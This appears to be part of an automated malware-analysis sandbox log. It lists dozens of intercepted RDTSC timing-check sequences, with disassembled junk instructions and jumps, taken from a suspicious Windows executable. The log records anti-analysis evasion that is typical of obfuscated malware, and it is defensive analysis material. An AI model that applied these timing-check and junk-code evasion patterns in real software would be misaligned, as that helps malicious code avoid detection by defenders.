Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 960844 second address: 96084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 96084A second address: 960850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 960850 second address: 960855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95EFA1 second address: 95EFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F231 second address: 95F237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F237 second address: 95F23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F527 second address: 95F52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95F918 second address: 95F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFED second address: 95FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFF3 second address: 95FFF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFF7 second address: 95FFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95FFFD second address: 96000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F5F64D1DF1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95E767 second address: 95E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 95E76B second address: 95E771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 965C05 second address: 965C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 965DE1 second address: 965DF3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 96772F second address: 967748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5F64D1DAB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jno 00007F5F64D1DAB6h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 967748 second address: 96774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975C63 second address: 975C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975C6D second address: 975C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B20ED second address: 8B2105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC2h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2105 second address: 8B2148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF24h 0x00000016 jmp 00007F5F64D1DF1Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2148 second address: 8B214E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B214E second address: 8B2165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8B2165 second address: 8B2169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975672 second address: 975676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975676 second address: 975680 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9757C3 second address: 9757F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5F64D1DF21h 0x0000000b ja 00007F5F64D1DF16h 0x00000011 jng 00007F5F64D1DF16h 0x00000017 jmp 00007F5F64D1DF1Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9757F2 second address: 975806 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5F64D1DABCh 0x00000008 jo 00007F5F64D1DAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 975806 second address: 975810 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AAE second address: 978AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AB2 second address: 978AF8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5F64D1DF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jl 00007F5F64D1DF55h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jne 00007F5F64D1DF16h 0x0000001a pushad 0x0000001b popad 0x0000001c jo 00007F5F64D1DF16h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5F64D1DF1Eh 0x0000002a jmp 00007F5F64D1DF23h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 978AF8 second address: 978AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 8A4D1E second address: 8A4D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5F64D1DF29h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A6CC second address: 97A6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A6D2 second address: 97A6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5F64D1DF1Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A837 second address: 97A83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 97A83B second address: 97A855 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jmp 00007F5F64D1DF1Dh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 984CCE second address: 984CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 98A35C second address: 98A385 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5F64D1DF16h 0x00000008 jmp 00007F5F64D1DF21h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F5F64D1DF1Eh 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007F5F64D1DF16h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9932EC second address: 993306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993306 second address: 993359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF24h 0x00000007 jmp 00007F5F64D1DF1Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 jng 00007F5F64D1DF16h 0x00000016 jmp 00007F5F64D1DF20h 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007F5F64D1DF1Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993644 second address: 993663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5F64D1DAC7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993663 second address: 993668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993668 second address: 99366E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99366E second address: 993674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993674 second address: 99367A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99367A second address: 993684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 993684 second address: 99369D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DAC5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9947AA second address: 9947D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f jmp 00007F5F64D1DF25h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99823F second address: 998244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 998244 second address: 998280 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF23h 0x00000007 jbe 00007F5F64D1DF18h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F5F64D1DF32h 0x00000017 pushad 0x00000018 jmp 00007F5F64D1DF24h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 997E1C second address: 997E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 997E22 second address: 997E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99C07A second address: 99C07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99C07E second address: 99C082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7EF second address: 99D7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7F7 second address: 99D7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 99D7FB second address: 99D7FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9A9E72 second address: 9A9E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA750 second address: 9BA75E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5F64D1DAB6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA75E second address: 9BA78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Ch 0x00000007 jmp 00007F5F64D1DF28h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA78C second address: 9BA792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA792 second address: 9BA79A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA79A second address: 9BA7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA7AA second address: 9BA7C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF24h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9BA483 second address: 9BA4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC7h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D34B1 second address: 9D34B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F42 second address: 9D2F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F48 second address: 9D2F5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D2F5A second address: 9D2F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a jl 00007F5F64D1DAE8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D30F8 second address: 9D3102 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D3102 second address: 9D3108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D3108 second address: 9D310C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D77EC second address: 9D77F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7AFE second address: 9D7B06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7B06 second address: 9D7B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F5F64D1DAC5h 0x0000000e push dword ptr [ebp+122D1961h] 0x00000014 jmp 00007F5F64D1DAC8h 0x00000019 push 50C08115h 0x0000001e push ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D7B4B second address: 9D7B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D9412 second address: 9D9418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D9418 second address: 9D941C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D941C second address: 9D9436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 9D8F9A second address: 9D8F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503001D second address: 5030022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030022 second address: 5030031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF1Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030031 second address: 503008F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5F64D1DAC1h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 jmp 00007F5F64D1DABCh 0x00000018 mov edx, eax 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5F64D1DAC6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 503008F second address: 5030093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030093 second address: 5030099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5030099 second address: 50300D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5F64D1DF1Dh 0x00000013 sbb ecx, 29E53286h 0x00000019 jmp 00007F5F64D1DF21h 0x0000001e popfd 0x0000001f mov dx, cx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50300D9 second address: 50300F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50300F5 second address: 50300F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010F70 second address: 5010F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010F9D second address: 5010FA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5010FA3 second address: 5010FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060136 second address: 5060169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, bh 0x00000011 call 00007F5F64D1DF24h 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5060169 second address: 506016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 506016F second address: 5060173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF01A3 second address: 4FF01B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABEh 0x00000009 rdtsc
